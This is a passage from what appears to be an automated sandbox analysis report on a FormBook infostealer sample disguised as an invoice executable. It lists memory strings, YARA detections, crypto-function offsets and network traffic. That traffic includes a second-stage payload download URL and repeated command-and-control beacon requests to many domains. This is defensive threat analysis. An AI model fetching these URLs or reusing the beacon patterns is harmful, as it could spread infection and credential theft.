Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin#
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin9
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.binO
Source: draft_inv dec21.exe, 00000008.00000002.6919966464.0000000000828000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.binZ
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp String found in binary or memory: https://word.office.com
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: https://www.avto-click.com/n8ds/?gHl=36nvuDOhb
Source: explorer.exe, 0000000A.00000000.7092992649.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6761388755.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6787904265.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6867008814.00000000114D9000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6858399983.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6736702475.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6811191351.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6835881125.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7066893065.00000000033F0000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpd
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown DNS traffic detected: queries for: statuswar.info
Source: global traffic HTTP traffic detected: GET /GHDFR/bin_rOlFDOAa61.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: statuswar.infoCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.luxalbridi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.receiptpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK HTTP/1.1Host: www.writingmomsobitwithmom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dczhd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.heyvecino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 162.241.120.147:443 -> 192.168.11.20:49790 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: draft_inv dec21.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02432CD7 1_2_02432CD7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242CB27 1_2_0242CB27
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242D058 1_2_0242D058
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02430A65 1_2_02430A65
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02431671 1_2_02431671
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242A671 1_2_0242A671
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_024302FD 1_2_024302FD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242FCFD 1_2_0242FCFD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0243069C 1_2_0243069C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E970EAD 8_2_1E970EAD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E979ED2 8_2_1E979ED2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E902E48 8_2_1E902E48
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E0E50 8_2_1E8E0E50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97EFBF 8_2_1E97EFBF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E971FC6 8_2_1E971FC6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CCF00 8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FF63 8_2_1E97FF63
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8CDF 8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFCE0 8_2_1E8DFCE0
